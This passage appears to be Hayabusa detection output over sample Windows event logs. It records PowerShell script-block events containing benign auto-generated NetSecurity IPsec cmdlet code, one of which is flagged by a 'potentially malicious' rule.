($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( 
[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) 
{ $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if 
($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase2AuthSet' -Alias '*' function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] 
${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject 
(cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper 
$PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] 